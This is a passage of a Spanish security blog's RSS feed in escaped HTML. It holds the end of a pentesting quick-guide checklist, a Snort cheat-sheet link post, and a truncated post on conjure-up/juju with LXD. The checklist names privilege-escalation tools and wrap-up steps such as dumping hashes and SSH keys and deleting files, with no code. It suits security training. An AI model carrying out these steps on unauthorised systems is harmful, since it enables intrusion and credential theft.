inherit; line-height: 1.3125; margin: 0px; min-width: 0px; overflow-wrap: break-word; padding: 0px; white-space: inherit;&quot;&gt;&lt;u&gt;WINDOWS&lt;/u&gt;&lt;/span&gt;&lt;span class=&quot;css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0&quot; style=&quot;border: 0px solid black; box-sizing: border-box; color: inherit; display: inline; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: 1.3125; margin: 0px; min-width: 0px; overflow-wrap: break-word; padding: 0px; white-space: inherit;&quot;&gt;wpc.exe &lt;/span&gt;&lt;a class=&quot;css-4rbku5 css-18t94o4 css-901oao css-16my406 r-1n1174f r-1loqt21 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0&quot; data-focusable=&quot;true&quot; dir=&quot;ltr&quot; href=&quot;https://t.co/gW7zUPHZZ9?amp=1&quot; rel=&quot; noopener noreferrer&quot; role=&quot;link&quot; style=&quot;border: 0px solid black; box-sizing: border-box; color: #1b95e0; cursor: pointer; display: inline; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: 1.3125; list-style: none; margin: 0px; min-width: 0px; overflow-wrap: break-word; padding: 0px; text-align: inherit; text-decoration-line: none; white-space: inherit;&quot; target=&quot;_blank&quot; title=&quot;http://windows-exploit-suggestor.py&quot;&gt;&lt;span aria-hidden=&quot;true&quot; class=&quot;css-901oao css-16my406 r-1qd0xha r-hiw28u r-ad9z0x r-bcqeeo r-qvutc0&quot; style=&quot;border: 0px solid black; box-sizing: border-box; color: inherit; display: inline; font-size: 0px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: 1.3125; margin: 0px; min-width: 0px; overflow-wrap: break-word; padding: 0px; white-space: inherit;&quot;&gt;http://&lt;/span&gt;windows-exploit-suggestor.py&lt;/a&gt;&lt;span class=&quot;css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0&quot; style=&quot;border: 0px solid black; box-sizing: border-box; color: inherit; display: inline; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: 1.3125; margin: 0px; min-width: 0px; overflow-wrap: break-word; padding: 0px; white-space: inherit;&quot;&gt;windows_privesc_check.py windows-privesc-check2.exe&lt;/span&gt;&lt;/div&gt;&lt;div aria-label=&quot;1 reply, 5 Retweets, 18 likes&quot; class=&quot;css-1dbjc4n r-18u37iz r-1wtj0ep r-156q2ks r-1mdbhws&quot; id=&quot;tweet-action-buttons&quot; role=&quot;group&quot; style=&quot;-webkit-box-align: stretch; -webkit-box-direction: normal; -webkit-box-orient: horizontal; -webkit-box-pack: justify; align-items: stretch; border: 0px solid black; box-sizing: border-box; display: flex; flex-basis: auto; flex-direction: row; flex-shrink: 0; justify-content: space-between; margin: 10px 0px 0px; max-width: 425px; min-height: 0px; min-width: 0px; padding: 0px; position: relative; z-index: 0;&quot;&gt;&lt;div class=&quot;css-1dbjc4n r-1iusvr4 r-18u37iz r-16y2uox r-1h0z5md&quot; style=&quot;-webkit-box-align: stretch; -webkit-box-direction: normal; -webkit-box-flex: 1; -webkit-box-orient: horizontal; -webkit-box-pack: start; align-items: stretch; background-color: #f5f8fa; border: 0px solid black; box-sizing: border-box; display: flex; flex-direction: row; flex: 1 0 0px; font-size: 15px; justify-content: flex-start; margin: 0px; min-height: 0px; min-width: 0px; padding: 0px; position: relative; z-index: 0;&quot;&gt;&lt;div aria-haspopup=&quot;true&quot; aria-label=&quot;Share Tweet&quot; class=&quot;css-18t94o4 css-1dbjc4n r-1777fci r-11cpok1 r-1ny4l3l r-bztko3 r-lrvibr&quot; data-focusable=&quot;true&quot; role=&quot;button&quot; style=&quot;-webkit-box-align: stretch; -webkit-box-direction: normal; -webkit-box-orient: vertical; -webkit-box-pack: center; align-items: stretch; border: 0px solid black; box-sizing: border-box; cursor: pointer; display: flex; flex-basis: auto; flex-direction: column; flex-shrink: 0; justify-content: center; margin: 0px; min-height: 0px; min-width: 0px; outline-style: none; overflow: visible; padding: 0px; position: relative; user-select: none; z-index: 0;&quot; tabindex=&quot;0&quot;&gt;&lt;div class=&quot;css-901oao r-1awozwy r-1re7ezh r-6koalj r-1qd0xha r-a023e6 r-16dba41 r-1h0z5md r-ad9z0x r-bcqeeo r-o7ynqc r-clp7b1 r-3s2u2q r-qvutc0&quot; dir=&quot;ltr&quot; style=&quot;-webkit-box-align: center; -webkit-box-pack: start; align-items: center; border: 0px solid black; box-sizing: border-box; color: #657786; display: flex; font-family: system-ui, -apple-system, BlinkMacSystemFont, &amp;quot;Segoe UI&amp;quot;, Roboto, Ubuntu, &amp;quot;Helvetica Neue&amp;quot;, sans-serif; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; justify-content: flex-start; line-height: 1.3125; margin: 0px; min-width: 0px; overflow-wrap: break-word; padding: 0px; transition-duration: 0.2s; transition-property: color; white-space: nowrap;&quot;&gt;&lt;div class=&quot;css-1dbjc4n r-xoduu5&quot; style=&quot;-webkit-box-align: stretch; -webkit-box-direction: normal; -webkit-box-orient: vertical; align-items: stretch; border: 0px solid black; box-sizing: border-box; display: inline-flex; flex-basis: auto; flex-direction: column; flex-shrink: 0; margin: 0px; min-height: 0px; min-width: 0px; padding: 0px; position: relative; z-index: 0;&quot;&gt;&lt;div class=&quot;css-1dbjc4n r-sdzlij r-1p0dtai r-xoduu5 r-1d2f490 r-xf4iuw r-u8s1d r-zchlnj r-ipm5af r-o7ynqc r-6416eg&quot; style=&quot;-webkit-box-align: stretch; -webkit-box-direction: normal; -webkit-box-orient: vertical; align-items: stretch; border-radius: 9999px; border: 0px solid black; bottom: 0px; box-sizing: border-box; display: inline-flex; flex-basis: auto; flex-direction: column; flex-shrink: 0; left: 0px; margin: -8px; min-height: 0px; min-width: 0px; padding: 0px; position: absolute; right: 0px; top: 0px; transition-duration: 0.2s; transition-property: background-color, box-shadow; z-index: 0;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;h3&gt;&lt;br /&gt;&lt;span style=&quot;background-color: #f5f8fa; color: #14171a; font-family: system-ui, -apple-system, BlinkMacSystemFont, &amp;quot;Segoe UI&amp;quot;, Roboto, Ubuntu, &amp;quot;Helvetica Neue&amp;quot;, sans-serif; font-size: 15px; white-space: pre-wrap;&quot;&gt;&lt;b&gt;ESCALADA DE PRIVILEGIOS&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;&lt;span style=&quot;background-color: #f5f8fa; color: #14171a; font-family: system-ui, -apple-system, BlinkMacSystemFont, &amp;quot;Segoe UI&amp;quot;, Roboto, Ubuntu, &amp;quot;Helvetica Neue&amp;quot;, sans-serif; font-size: 15px; white-space: pre-wrap;&quot;&gt;Acceso a servicios internos (portfwd) Añadir una cuenta  WINDOWS Lista de exploits  LINUX Sudo su  KernelDB Searchsploit&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: #f5f8fa; color: #14171a; font-family: system-ui, -apple-system, BlinkMacSystemFont, &amp;quot;Segoe UI&amp;quot;, Roboto, Ubuntu, &amp;quot;Helvetica Neue&amp;quot;, sans-serif; font-size: 15px; white-space: pre-wrap;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;h3&gt;&lt;span style=&quot;background-color: white; color: #14171a; font-family: system-ui, -apple-system, BlinkMacSystemFont, &amp;quot;Segoe UI&amp;quot;, Roboto, Ubuntu, &amp;quot;Helvetica Neue&amp;quot;, sans-serif; font-size: 15px; white-space: pre-wrap;&quot;&gt;&lt;b&gt;FINALIZACIÓN&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;&lt;span style=&quot;background-color: white; color: #14171a; font-family: system-ui, -apple-system, BlinkMacSystemFont, &amp;quot;Segoe UI&amp;quot;, Roboto, Ubuntu, &amp;quot;Helvetica Neue&amp;quot;, sans-serif; font-size: 15px; white-space: pre-wrap;&quot;&gt;Capturas de pantalla IPConfig\WhoamI Dump hashes  Dump SSH Keys Borrado de archivos Documentación final.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: white; color: #14171a; font-family: system-ui, -apple-system, BlinkMacSystemFont, &amp;quot;Segoe UI&amp;quot;, Roboto, Ubuntu, &amp;quot;Helvetica Neue&amp;quot;, sans-serif; font-size: 15px; white-space: pre-wrap;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;color: #14171a; font-family: system-ui, -apple-system, BlinkMacSystemFont, Segoe UI, Roboto, Ubuntu, Helvetica Neue, sans-serif;&quot;&gt;&lt;span style=&quot;background-color: white; font-size: 15px; white-space: pre-wrap;&quot;&gt;Me he tomado la liberta de &quot;compartir&quot; esta pequeña guian en el Blog para que no caiga en el olvido del timeline de Twitter.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #14171a; font-family: system-ui, -apple-system, BlinkMacSystemFont, Segoe UI, Roboto, Ubuntu, Helvetica Neue, sans-serif;&quot;&gt;&lt;span style=&quot;background-color: white; font-size: 15px; white-space: pre-wrap;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #14171a; font-family: system-ui, -apple-system, BlinkMacSystemFont, Segoe UI, Roboto, Ubuntu, Helvetica Neue, sans-serif;&quot;&gt;&lt;span style=&quot;background-color: white; font-size: 15px; white-space: pre-wrap;&quot;&gt;Gracias &lt;a href=&quot;https://twitter.com/perito_inf/status/1178741955561492481&quot;&gt;Israel&lt;/a&gt; por compartir&lt;/span&gt;&lt;/span&gt;</description><link>http://www.seguridadparatodos.es/2019/10/guia-rapida-para-realizar-un-pentesting.html</link><author>noreply@blogger.com (Julian J. Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://1.bp.blogspot.com/-yAtoez_xS74/XZMCYpOYFGI/AAAAAAAAftk/wz0CLkCYyfQAnghT_zB3crYHcaZd2mTRACLcBGAsYHQ/s72-c/guia_pentest.PNG" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-7070180985827329973</guid><pubDate>Tue, 01 Oct 2019 07:18:00 +0000</pubDate><atom:updated>2019-10-01T09:25:02.433+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Cheat Sheet</category><category domain="http://www.blogger.com/atom/ns#">CyberDefense</category><category domain="http://www.blogger.com/atom/ns#">cybersecurity</category><category domain="http://www.blogger.com/atom/ns#">Sniffer</category><category domain="http://www.blogger.com/atom/ns#">Snort</category><title>Great SNORT - Cheat Sheet</title><description>&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;https://1.bp.blogspot.com/-Z1c-3OPCWy4/XZL8Cs4cF9I/AAAAAAAAftY/0cqO9eDvU5oYzOkU5kIlWkAuL8OgOz-jACLcBGAsYHQ/s1600/Snort-Cheat-Sheet-header.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;600&quot; data-original-width=&quot;1200&quot; height=&quot;320&quot; src=&quot;https://1.bp.blogspot.com/-Z1c-3OPCWy4/XZL8Cs4cF9I/AAAAAAAAftY/0cqO9eDvU5oYzOkU5kIlWkAuL8OgOz-jACLcBGAsYHQ/s640/Snort-Cheat-Sheet-header.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;Cheat Sheet - SNORT&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;Hace tiempo escribí un articulo sobre la distribución Security Onion, que podéis leer &lt;a href=&quot;https://www.seguridadparatodos.es/2011/09/linux-distro-security-onion.html&quot;&gt;aquí&lt;/a&gt;.&lt;br /&gt;&lt;div&gt;&lt;br /&gt;El proyecto ha seguido evolucionando, son numerosos los cambios introducidos, para aquellos interesados os dejo el enlace:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;- Información:&amp;nbsp;&lt;a href=&quot;https://securityonion.net/&quot;&gt;https://securityonion.net&lt;/a&gt;&lt;/div&gt;&lt;div&gt;- Download:&amp;nbsp;&lt;a href=&quot;https://github.com/Security-Onion-Solutions/security-onion/blob/master/Verify_ISO.md&quot;&gt;https://github.com/Security-Onion-Solutions/security-onion/blob/master/Verify_ISO.md&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Pero el motivo de escribir esta &quot;mini&quot; entrada, es compartir con todos una hoja resumen de comando sobre SNORT,&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Please, If you want to know how works SNORT go to:&amp;nbsp;&lt;a href=&quot;https://www.snort.org/&quot;&gt;https://www.snort.org/&lt;/a&gt;, but if you know how it works, then you must want to have the following cheat sheet.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;strong&gt;The Snort Cheat Sheet&lt;/strong&gt; covers:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Sniffer mode, Packet logger mode, and NIDS mode operation&lt;/li&gt;&lt;li&gt;Snort rules format&lt;/li&gt;&lt;li&gt;Logger mode command line options&lt;/li&gt;&lt;li&gt;NIDS mode options&lt;/li&gt;&lt;li&gt;Alert and rule examples&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;&lt;b&gt;REF&lt;/b&gt;:&amp;nbsp;&lt;a href=&quot;https://www.comparitech.com/net-admin/snort-cheat-sheet/&quot;&gt;https://www.comparitech.com/net-admin/snort-cheat-sheet/&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Thanks to Hannah, who send me a email with Link.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;</description><link>http://www.seguridadparatodos.es/2019/10/great-snort-cheat-sheet.html</link><author>noreply@blogger.com (Julian J. Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://1.bp.blogspot.com/-Z1c-3OPCWy4/XZL8Cs4cF9I/AAAAAAAAftY/0cqO9eDvU5oYzOkU5kIlWkAuL8OgOz-jACLcBGAsYHQ/s72-c/Snort-Cheat-Sheet-header.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-1704811543912205792</guid><pubDate>Tue, 15 May 2018 16:00:00 +0000</pubDate><atom:updated>2018-08-29T12:36:23.316+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">BigData</category><category domain="http://www.blogger.com/atom/ns#">Cluster</category><category domain="http://www.blogger.com/atom/ns#">Conjure-up</category><category domain="http://www.blogger.com/atom/ns#">Docker</category><category domain="http://www.blogger.com/atom/ns#">Linux</category><category domain="http://www.blogger.com/atom/ns#">LXD</category><category domain="http://www.blogger.com/atom/ns#">OpenStack</category><category domain="http://www.blogger.com/atom/ns#">Ubuntu</category><title>conjure-up / juju Magic &amp; Linux Container (LXD)</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://4.bp.blogspot.com/-VDnQ75J1TrE/W4Z3EhR--dI/AAAAAAAAfFM/EiNHUZKtgLs5DDDh_7g65ToKm26AKY2zACLcBGAs/s1600/conjure_up_320x390.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;226&quot; data-original-width=&quot;247&quot; height=&quot;292&quot; src=&quot;https://4.bp.blogspot.com/-VDnQ75J1TrE/W4Z3EhR--dI/AAAAAAAAfFM/EiNHUZKtgLs5DDDh_7g65ToKm26AKY2zACLcBGAs/s320/conjure_up_320x390.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;color: rgba(0 , 0 , 0 , 0.75); font-family: &amp;quot;source serif pro&amp;quot; , serif; font-size: 20px; white-space: pre-wrap;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;color: rgba(0 , 0 , 0 , 0.75); font-family: &amp;quot;source serif pro&amp;quot; , serif; font-size: 20px; white-space: pre-wrap;&quot;&gt;Con este titulo más parecido a un capitulo de Harry Potter, os presento el Orquestador para Linux Container (LXD). &lt;/span&gt;&lt;a href=&quot;https://jujucharms.com/&quot; rel=&quot;noopener nofollow&quot; style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border: 0px; box-sizing: border-box; color: #665ed0; font-family: &amp;quot;Source Serif Pro&amp;quot;, serif; font-size: 20px; margin: 0px; padding: 0px; text-decoration-line: none; vertical-align: baseline; white-space: pre-wrap; word-wrap: break-word;&quot; target=&quot;_blank&quot;&gt;Ver enlace&lt;/a&gt;&lt;span style=&quot;color: rgba(0 , 0 , 0 , 0.75); font-family: &amp;quot;source serif pro&amp;quot; , serif; font-size: 20px; white-space: pre-wrap;&quot;&gt;.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: rgba(0 , 0 , 0 , 0.75); font-family: &amp;quot;source serif pro&amp;quot; , serif; font-size: 20px; white-space: pre-wrap;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;https://4.bp.blogspot.com/-m7NtzwjxaAg/WvqSbmkKI3I/AAAAAAAAe6M/E7JTMv183tc8csVhX118pOzRsDeSpFQQgCLcBGAs/s1600/scale_test_juju.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;528&quot; data-original-width=&quot;1127&quot; height=&quot;298&quot; src=&quot;https://4.bp.blogspot.com/-m7NtzwjxaAg/WvqSbmkKI3I/AAAAAAAAe6M/E7JTMv183tc8csVhX118pOzRsDeSpFQQgCLcBGAs/s640/scale_test_juju.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;OpenStack / LXD + JujuCharms (https://jujucharms.com/)&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;span style=&quot;color: rgba(0 , 0 , 0 , 0.75); font-family: &amp;quot;source serif pro&amp;quot; , serif; font-size: 20px; white-space: pre-wrap;&quot;&gt;Como si por arte de &quot;Magia&quot; se tratase, &quot;&lt;/span&gt;&lt;a href=&quot;https://conjure-up.io/&quot; rel=&quot;noopener nofollow&quot; style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border: 0px; box-sizing: border-box; color: #665ed0; font-family: &amp;quot;Source Serif Pro&amp;quot;, serif; font-size: 20px; margin: 0px; padding: 0px; vertical-align: baseline; white-space: pre-wrap; word-wrap: break-word;&quot; target=&quot;_blank&quot;&gt;conjure-up&lt;/a&gt;&lt;span style=&quot;color: rgba(0 , 0 , 0 , 0.75); font-family: &amp;quot;source serif pro&amp;quot; , serif; font-size: 20px; white-space: pre-wrap;&quot;&gt;&quot; es la forma más rápida (dependerá de tus recursos principalmente el disco duro SSD) de crear un cluster Kubernetes perfectamente configurado y listo para trabajar.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: rgba(0 , 0 , 0 , 0.9); font-family: , , &amp;quot;blinkmacsystemfont&amp;quot; , &amp;quot;segoe ui&amp;quot; , &amp;quot;roboto&amp;quot; , &amp;quot;helvetica neue&amp;quot; , &amp;quot;fira sans&amp;quot; , &amp;quot;ubuntu&amp;quot; , &amp;quot;oxygen&amp;quot; , &amp;quot;oxygen sans&amp;quot; , &amp;quot;cantarell&amp;quot; , &amp;quot;droid sans&amp;quot; , &amp;quot;lucida grande&amp;quot; , &amp;quot;helvetica&amp;quot; , &amp;quot;arial&amp;quot; , sans-serif , &amp;quot;apple color emoji&amp;quot; , &amp;quot;segoe ui emoji&amp;quot; , &amp;quot;segoe ui emoji&amp;quot; , &amp;quot;segoe ui symbol&amp;quot;; font-size: 20px; white-space: pre-wrap;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;color: rgba(0 , 0 , 0 , 0.9); font-family: , , &amp;quot;blinkmacsystemfont&amp;quot; , &amp;quot;segoe ui&amp;quot; , &amp;quot;roboto&amp;quot; , &amp;quot;helvetica neue&amp;quot; , &amp;quot;fira sans&amp;quot; , &amp;quot;ubuntu&amp;quot; , &amp;quot;oxygen&amp;quot; , &amp;quot;oxygen sans&amp;quot; , &amp;quot;cantarell&amp;quot; , &amp;quot;droid sans&amp;quot; , &amp;quot;lucida grande&amp;quot; , &amp;quot;helvetica&amp;quot; , &amp;quot;arial&amp;quot; , sans-serif , &amp;quot;apple color emoji&amp;quot; , &amp;quot;segoe ui emoji&amp;quot; , &amp;quot;segoe ui emoji&amp;quot; , &amp;quot;segoe ui symbol&amp;quot;; font-size: 20px; white-space: pre-wrap;&quot;&gt;&lt;b&gt;Limitaciones&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: rgba(0 , 0 , 0 , 0.75); font-family: &amp;quot;source serif pro&amp;quot; , serif; font-size: 20px; white-space: pre-wrap;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;color: rgba(0 , 0 , 0 , 0.75); font-family: &amp;quot;source serif pro&amp;quot; , serif; font-size: 20px; white-space: pre-wrap;&quot;&gt;Si deseas trabajar &quot;localmente&quot; en un Host, se presentan ciertas limitaciones técnicas a la hora de utilizar conjure-up, o incluso &quot;juju&quot;.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: rgba(0 , 0 , 0 , 0.75); font-family: &amp;quot;source serif pro&amp;quot; , serif; font-size: 20px; white-space: pre-wrap;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;ol&gt;&lt;li&gt;La instalación local solamente contempla trabajar con un &quot;equipo físico (hardware)&quot;, aunque la herramienta juju permite trabajar con múltiples proveedores de Cloud (Azure, Google Cloud , AWS) será utilizando LXD localmente cuando más partido se le puede sacar a estar herramienta.&lt;/li&gt;&lt;li&gt;Networking, se debe diseñar muy bien inicialmente todo lo necesario para la comunicación entre los contenedores, así como la publicación de los recursos. Si trabajas con un cluster Kubernetes ya tendrás cierta experiencia en ello. No obstante, hay que realizar un buen planteamiento de networking antes de comenzar. Sobre todo con el objetivo de la publicación de los recursos.&lt;/li&gt;&lt;/ol&gt;Esas son las principales &quot;limitaciones&quot;, puesto que si deseamos disponer de múltiples Host (bare metal / hardware) la opción de utilizar conjure-up &quot;localmente&quot; no contempla de momento la capacidad de &quot;clustering&quot; que trae LXD 3.0. Por lo que el diseño de networkin inicial será fundamental para ser capaz de comunicar varios Host (Hardware / VM) entre si, y las APP contenidas en LXD. Un ejemplo claro, es desplegar todo un cluster Kubernetes en un Host (localhost) y luego querer ampliar la capacidad del cluster añadiendo &quot;Worker / Nodos al cluster&quot; en otros Host para alta disponibilidad y recursos. Esto requiere de un diseño de la red (previo al despliegue) y &quot;tunning&quot; a nivel de networking para lograrlo. Puesto que la herramienta de momento (como he comentado anteriormente) no contempla la capacidad de utilizar la funcionalidad nativa de clustering.&lt;br /&gt;&lt;span style=&quot;color: rgba(0 , 0 , 0 , 0.75); font-family: &amp;quot;source serif pro&amp;quot; , serif; font-size: 20px; white-space: pre-wrap;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;color: rgba(0 , 0 , 0 , 0.75); font-family: &amp;quot;source serif pro&amp;quot; , serif; font-size: 20px; white-space: pre-wrap;&quot;&gt;Cómo parece lógico, la opción de utilizar LXD, es evitar utilizar HyperV/VMWare en tus servidores locales, creando tu propia Cloud con los recursos hardware directamente con LXD, que por otro lado, mejoran los resultados al trabajar con lo que denominan pure-container hypervisor [&lt;/span&gt;&lt;a href=&quot;https://blog.ubuntu.com/2015/05/18/lxd-crushes-kvm-in-density-and-speed&quot; rel=&quot;noopener nofollow&quot; style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border: 0px; box-sizing: border-box; color: #665ed0; font-family: &amp;quot;Source Serif Pro&amp;quot;, serif; font-size: 20px; margin: 0px; padding: 0px; text-decoration-line: none; vertical-align: baseline; white-space: pre-wrap; word-wrap: break-word;&quot; target=&quot;_blank&quot;&gt;info&lt;/a&gt;&lt;span style=&quot;color: rgba(0 , 0 , 0 , 0.75); font-family: &amp;quot;source serif pro&amp;quot; , serif; font-size: 20px; white-space: pre-wrap;&quot;&gt;].&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: rgba(0 , 0 , 0 , 0.75); font-family: &amp;quot;source serif pro&amp;quot; , serif; font-size: 20px; white-space: pre-wrap;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;color: rgba(0 , 0 , 0 , 0.75); font-family: &amp;quot;source serif pro&amp;quot; , serif; font-size: 20px; white-space: pre-wrap;&quot;&gt;Por tanto, si quieres trabajar en producción con LXD + juju como orquestador, te recomiendo:&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: rgba(0 , 0 , 0 , 0.75); font-family: &amp;quot;source serif pro&amp;quot; , serif; font-size: 20px; white-space: pre-wrap;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Una Host con al menos 128GB RAM, 4 CPUS, disco duro SSD local + cabina (storage) con direct attach de tipo SSD,&amp;nbsp;&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;U&lt;span style=&quot;color: rgba(0 , 0 , 0 , 0.75); font-family: &amp;quot;source serif pro&amp;quot; , serif; font-size: 20px; white-space: pre-wrap;&quot;&gt;n según Host de igual capacidad conectado a la cabina storage (direct Attach)&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;span style=&quot;color: rgba(0 , 0 , 0 , 0.75); font-family: &amp;quot;source serif pro&amp;quot; , serif; font-size: 20px; white-space: pre-wrap;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;color: rgba(0 , 0 , 0 , 0.75); font-family: &amp;quot;source serif pro&amp;quot; , serif; font-size: 20px; white-space: pre-wrap;&quot;&gt;Con esto montar dos &quot;cluster locales kuebernetes&quot; y utilizar la capacidad de federación entre cluster de kubernetes, que permitirá repartir y balancear los recursos entre los cluster federados. [&lt;/span&gt;&lt;a href=&quot;https://kubernetes.io/docs/concepts/cluster-administration/federation/&quot; rel=&quot;noopener nofollow&quot; style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border: 0px; box-sizing: border-box; color: #665ed0; font-family: &amp;quot;Source Serif Pro&amp;quot;, serif; font-size: 20px; margin: 0px; padding: 0px; text-decoration-line: none; vertical-align: baseline; white-space: pre-wrap; word-wrap: break-word;&quot; target=&quot;_blank&quot;&gt;info&lt;/a&gt;&lt;span style=&quot;color: rgba(0 , 0 , 0 , 0.75); font-family: &amp;quot;source serif pro&amp;quot; , serif; font-size: 20px; white-space: pre-wrap;&quot;&gt;]&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: rgba(0 , 0 , 0 , 0.75); font-family: &amp;quot;source serif pro&amp;quot; , serif; font-size: 20px; white-space: pre-wrap;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;color: rgba(0 , 0 , 0 , 0.75); font-family: &amp;quot;source serif pro&amp;quot; , serif; font-size: 20px; white-space: pre-wrap;&quot;&gt;V&lt;/span&gt;&lt;span style=&quot;color: rgba(0 , 0 , 0 , 0.9); font-family: , , &amp;quot;blinkmacsystemfont&amp;quot; , &amp;quot;segoe ui&amp;quot; , &amp;quot;roboto&amp;quot; , &amp;quot;helvetica neue&amp;quot; , &amp;quot;fira sans&amp;quot; , &amp;quot;ubuntu&amp;quot; , &amp;quot;oxygen&amp;quot; , &amp;quot;oxygen sans&amp;quot; , &amp;quot;cantarell&amp;quot; , &amp;quot;droid sans&amp;quot; , &amp;quot;lucida grande&amp;quot; , &amp;quot;helvetica&amp;quot; , &amp;quot;arial&amp;quot; , sans-serif , &amp;quot;apple color emoji&amp;quot; , &amp;quot;segoe ui emoji&amp;quot; , &amp;quot;segoe ui emoji&amp;quot; , &amp;quot;segoe ui 